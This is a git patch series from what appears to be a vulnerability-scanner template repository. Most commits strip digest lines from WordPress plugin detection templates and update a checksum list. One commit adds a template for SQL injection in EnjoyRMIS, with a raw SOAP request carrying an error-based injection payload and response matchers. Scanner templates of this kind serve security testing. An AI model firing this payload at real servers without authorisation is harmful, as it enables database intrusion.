490a00463044022002cb7159003c69590ebc4214198fd1f1b8c798163243c707c7d55b2453aec04802202ea4568642a3f249bff0b78ccb218f609a836afd4a9488046c4e3c27dba6e84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 6f8f1eafeb..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8a3370d994776f9aa06002a388b0e640b21ca4057d545ec9eb57677ac4e7c7f02200ad415cf000ad3fd3cb88684324f25ff3e3c1302877f105782b175daf668cf46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 2a76c165e1..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202dc03dffef83f6e4e23d5089ec659aaa547889016e8c6325d7d79f98a60ab3580220107ce17ed3684fa595ef117e02c12524e43670bb63059f3a15981439f9d2d258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 9e83c8a4bd..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce0c52270a2823c2447566da1a8d277240e957134c62019b2b1d643a77385c7a022058bc677918cda673580fb16fe4fed1839068f5b97b1dc40d7f1555e9a0f2c1e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 15edd6d165..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd43ed8213d34edefe0ec92e186674ee50beb7391ef6d0a0c822bb74e033fc35022100963a8f52687f3d05a17cb931076c2ee602e042ee0a724005c8e771f81b489517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index f90ebd1d10..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd6168be1e840f01a9988f9d27fdf3c4d945640c194953f4ff0afa04cc8f02e8022100bf4086489e9d71f26aadbd0537badacda08d7964a90d5823bdb44cd6b57cc2fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0c8242b84c..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5097fdc17dfebf694d520cdb00079d2360ed2976300168a12a0d6168786ecf3022100d9b2c6430a1d902f75b8792a008a265dd5d450bfb85e742960331c7142d0e913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 203157adb0..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075db0a755e4d8070eb450b895802c1a1ead8f50aa91f461a54a8796cbedbde3e02210089984253d68d24b6fd5f2f3e18f15f43a23656893448d7b5b21a3ab31e27a95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 966e622696..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085ef04ef23489f8089c92bdbce14a5e4f77ed22aa39ab3a063a23c3494946c5d022066e25ea6edd8a46b0eb7dc429a28913326b121e9107869e941f37ebc68f95179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index e7f02307ae..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a0599e6a48201cfc23020b6347895ade4fa8ed59c7c5f71577bdc2783148232e022009af9f01415c8058fc2d60a0b8b29cdd88504aca7e621edb923f29b809316a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5159085003..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220246f8878bc39375b062f06101e2a25e77eed203893b9247907874fb3ab940a1902201f9a17539bcf4a7e9cb15370d6e43299a5126dd4266edb4b3ee205b8058c5c29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 4ec7215e76..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025a9264de54c265a887fe6c95b92eaffc8b6f5dc0dd9bf7ca766aa538dc892b8022007373f424ef35098f4d05fdbc9cab7f46a8ef2accf7fd4b654abf2dd9cce7e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index c2ff42f48d..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202907641e38f98753d6b4591dd46bb35a88175f573d90ba9154c429e5d263e1bc022036cf145b6f04bbb8e4573daaf3abb344e19dcd77905a40cedbf8bea34da3d3a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 5c15be7aa9..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220144ae23297bbe19320b7126cc9a31668b655110d2b4ce1da0614d018bf91107f022100dceb1d51feb3545548177c7affc4194814e9d6f28a338b5502cb11a73adb66f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1161656677..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-wpforms-lite info: - name: Contact Form by WPForms – Drag & Drop Form Builder for WordPress Detection + name: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f48278fdda8a3a150b87525907e59c672740e52d57cfaf6c85403c0f6979a83e02204cbeb77c919c6f3890254e1482281f1029c1e8d4e4ad61d18b90597909fe1b80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 0b4b625acf..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe4991754e35a05f325dda67092b7a8c323103bde7db7ba94451d58e089f2e09022100b1b25256d0b39a2238fcd17697247a2627fc0059db9a8331c1cf397945caddda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 07e0491e54..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b3a6ea7e2d226b296972012ff1dff50e8767c443aff672ff6c6d5d94510a44e402204bd31edefd6dc570eb01e01005b709064462fb982c4431839436c05ffc44c3f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index a490cd15c8..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100976b18838f8ebfc7e5c2e93da5a7f5f1b00fc082c523a4dac4af427e78788a28022059e0e7572a92eeef776c49ea26ef65cddbef997ce0696c1f679e66612db39425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 948844c4073514e618c197ec192b53990d2f8583 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 10 Jul 2024 03:26:48 +0300 Subject: [PATCH 1032/1841] add enjoyrmis sqli --- .../vulnerabilities/other/enjoyrmis-sqli.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/vulnerabilities/other/enjoyrmis-sqli.yaml diff --git a/http/vulnerabilities/other/enjoyrmis-sqli.yaml b/http/vulnerabilities/other/enjoyrmis-sqli.yaml new file mode 100644 index 0000000000..23aa923942 --- /dev/null +++ b/http/vulnerabilities/other/enjoyrmis-sqli.yaml @@ -0,0 +1,35 @@ +id: enjoyrmis-sqli + +info: + name: EnjoyRMIS - SQL Injection + author: securityforeveryone + severity: high + description: | + EnjoyRMIS is vulnerable to a SQL injection in the GetOAById SOAP endpoint. An attacker can exploit this to execute arbitrary SQL commands. + reference: + - https://github.com/wy876/POC/blob/main/EnjoyRMIS-GetOAById%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: body="CheckSilverlightInstalled" +http: + - raw: + - | + POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=utf-8 + SOAPAction: "http://tempuri.org/GetOAById" + + + + + + string' AND 8448 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8448=8448) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'OFyo'='OFyo + + + + + matchers: + - type: dsl + dsl: + - 'contains(body,"qqqzq1qvkqq")' + - 'status_code == 500' + condition: and From d6fbb9fc615a3cc045e09b1d16bf7f718e9c3b41 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:02:44 +0000 Subject: [PATCH 1033/1841] Auto Generated Templates Checksum [Wed Jul 10 06:02:44 UTC 2024] :robot: --- templates-checksum.txt | 431 +++++++++++++++++++++-------------------- 1 file changed, 216 insertions(+), 215 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4bbb960776..d4fdb2fcfc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -744,7 +744,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:6d70c79393f5965a0a6bf1ce1c44267412d992e3 +helpers/wordpress/plugins/astra-sites.txt:3d21640165adc9cb26c17e43dc6358a33c744d03 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 helpers/wordpress/plugins/backwpup.txt:93cd63d42092dfdf799d4cecf593fe4d574f77dd @@ -799,13 +799,13 @@ helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd38 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 -helpers/wordpress/plugins/formidable.txt:309bd303ec4d8c564bacf4b39075aa7866dcdea4 +helpers/wordpress/plugins/formidable.txt:4c8c0a65f9f10ab6175d297b0d38cb82de78d3a8 helpers/wordpress/plugins/forminator.txt:6ee02b82336e55125a24970b177a069b10306436 helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c helpers/wordpress/plugins/google-analytics-for-wordpress.txt:51e5b4744f672fbc75ac2043bb18ffd8d1d563c3 -helpers/wordpress/plugins/google-listings-and-ads.txt:f0500ea689c78156fdded5bae29d903f2d632a9b +helpers/wordpress/plugins/google-listings-and-ads.txt:cef8b08512cec8f1ab07ed0f568d56f767ca88fa helpers/wordpress/plugins/google-site-kit.txt:451786e82a4757f98ef5d85c39adb09689db4c3f helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 @@ -839,19 +839,19 @@ helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 -helpers/wordpress/plugins/mailpoet.txt:49c2b48e15e5e7f6c4cdd7b50db59c6c027c27a5 +helpers/wordpress/plugins/mailpoet.txt:8ee7471e0c39a54428f13c32349d570cc514d8d2 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 -helpers/wordpress/plugins/mainwp-child.txt:6746a82081d852d58b152584407d5b80d3ac43f3 +helpers/wordpress/plugins/mainwp-child.txt:218d96849acd4f3914538408fbb4a3dca66ff25c helpers/wordpress/plugins/malcare-security.txt:ba9db54a3e9b0df9d1362a546f3b3e62f1aa032c helpers/wordpress/plugins/megamenu.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 helpers/wordpress/plugins/meta-box.txt:55193864c8fe639aac62a66b52b3b102397e0cf9 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 -helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 -helpers/wordpress/plugins/newsletter.txt:546125357bf982752670c95debb34247c20f3724 +helpers/wordpress/plugins/ml-slider.txt:75c024ece33c58576c793ad8930682e902abfb64 +helpers/wordpress/plugins/newsletter.txt:93109af0518936aa8758247972de3f7d29690602 helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 -helpers/wordpress/plugins/ninja-forms.txt:ce69bc556a6db2eb8d56b75a008630d482b077ce +helpers/wordpress/plugins/ninja-forms.txt:b551dceb18411def5ed66556a7d0855f82ba865f helpers/wordpress/plugins/ocean-extra.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 helpers/wordpress/plugins/official-facebook-pixel.txt:49f9230a0175e58b6964e60aa97809134e03c8ae helpers/wordpress/plugins/one-click-demo-import.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b @@ -862,7 +862,7 @@ helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:024e6d4f5d6db7d7e0b074cb50b41ad492ddb8c3 -helpers/wordpress/plugins/pixelyoursite.txt:0b613b1113c478fd8e9cb11573a0ce72f209ead3 +helpers/wordpress/plugins/pixelyoursite.txt:974a8526fa7eca888635cdcce48149cb3d049570 helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d @@ -883,7 +883,7 @@ helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90ded helpers/wordpress/plugins/shortcodes-ultimate.txt:bd1b35ea2c8692269da8a819c39a7433032177ea helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b -helpers/wordpress/plugins/simple-history.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 +helpers/wordpress/plugins/simple-history.txt:ee49c41e728b7af9b4fa9de669951863a79a98b1 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e helpers/wordpress/plugins/siteorigin-panels.txt:95d3da7ccba2614dea34b493903fa307600e3a01 @@ -892,7 +892,7 @@ helpers/wordpress/plugins/so-widgets-bundle.txt:6d445f8f926ce0b81a2d46eb8ce60af3 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a1231facbb4b8314300cb531105cd765f90c95f1 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84 -helpers/wordpress/plugins/sucuri-scanner.txt:418cebfead647b325cd7291fe371d7f92515a84f +helpers/wordpress/plugins/sucuri-scanner.txt:381bb12da04a82580bb6d698b8798743668826bd helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23213cd79b5f3f3 helpers/wordpress/plugins/tablepress.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 @@ -949,7 +949,7 @@ helpers/wordpress/plugins/wp-super-cache.txt:f84939ff21a1ffe63d6f3e405737228a6e1 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a -helpers/wordpress/plugins/wpforms-lite.txt:5c03b265ddd394e2c86d928b3879d8d0b526cbaf +helpers/wordpress/plugins/wpforms-lite.txt:c7624be5ee3565a7d73bf89b73d5c6cb6a8a88d5 helpers/wordpress/plugins/wps-hide-login.txt:51a2a1f09e1587e93a965d8ae52c2309477eba45 helpers/wordpress/plugins/wpvivid-backuprestore.txt:42932d0fb47c40d001ff73872d5fff049a1361b5 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 @@ -992,7 +992,7 @@ http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 -http/cnvd/2024/CNVD-2021-64035.yaml:72e13892259adbdb784717e77980d864e6370801 +http/cnvd/2024/CNVD-2021-64035.yaml:101bc2035763e358d63266a80193de575b376202 http/cnvd/2024/CNVD-2024-15077.yaml:d97b1860e5154481146b5ebaf48f57448f62ecd1 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:8362d36f1fa45da68449901d392ba84be2f4a368 @@ -3485,7 +3485,7 @@ http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b -http/cves/2024/CVE-2024-4836.yaml:13484506cd2984ec71aa622e5987b30e30f9efc9 +http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a @@ -6874,6 +6874,7 @@ http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd http/technologies/apache/apache-answer-detect.yaml:48deef16a566d4847d23b77e4efcbc6d58690f8f http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd +http/technologies/apache/apache-cloudstack-detect.yaml:de5a1484d6f379b5a85c35e5a8050cfaf6bdc261 http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495 http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a @@ -7267,228 +7268,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:a7e72344b7bcec223ee4063d62a2b362c7a37e0b -http/technologies/wordpress/plugins/add-to-any.yaml:6e38d780d00390e4f965a26f186b5f2248fc0757 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:369ef2a4bf977679e45321df903a7f9caed62481 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:690e9a9a6834f5cb49e7036439ab90b497a87fb9 -http/technologies/wordpress/plugins/akismet.yaml:9bbe32506dc49c4fa8741962813acdb22656b0a4 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:fb5343e825f295133d534855710eb863a2f197d3 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:eac6998cf1a6a3d3b218d3f816b3e4819fd9d52a -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:97f925eb77a7f96d687756b0e65db6abe4ab0d99 -http/technologies/wordpress/plugins/amp.yaml:5b9f7bb509c799266f72389cbfad3f86269ecaba -http/technologies/wordpress/plugins/antispam-bee.yaml:542df3cd80dd6295bdf319ca48d27ba4bd7daa95 -http/technologies/wordpress/plugins/astra-sites.yaml:72ab35f28764dfbd9d85c70f785c07fd0a6515cd +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:426dc7830792629c5c2ba46ed4e4a800503d50dc -http/technologies/wordpress/plugins/backwpup.yaml:d0160dbcb7263b9c5976d24e480248d65599d91e -http/technologies/wordpress/plugins/better-search-replace.yaml:0af2915e14ac6175c7d3356434b5f96cc3bf2554 -http/technologies/wordpress/plugins/better-wp-security.yaml:32c98f91d4bd0470072d60d48b6f162e7c0c9026 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:5bcad211ed46846c8765a788c17aa9eb291d8d0e -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:6d024dbecf81e850f0297a47fb4d2a5baacf9972 -http/technologies/wordpress/plugins/breeze.yaml:316bf9f238d0513336203902626e84cadd065d22 -http/technologies/wordpress/plugins/broken-link-checker.yaml:af2c18509198c9be396d1bfc8e199d0a427467da -http/technologies/wordpress/plugins/chaty.yaml:69ea3099d76659574b55a3573333717406777766 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:fc825238d7081528d833b024ad2bf1a6ecf6682e -http/technologies/wordpress/plugins/classic-editor.yaml:ad0f5090f7de418b560806c41ff4a6343103008d -http/technologies/wordpress/plugins/classic-widgets.yaml:9a14336044c1fd8a88315866e925b7f9a025a034 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:ed2e50f85511a411a409d39b73d4f50710a5fafd 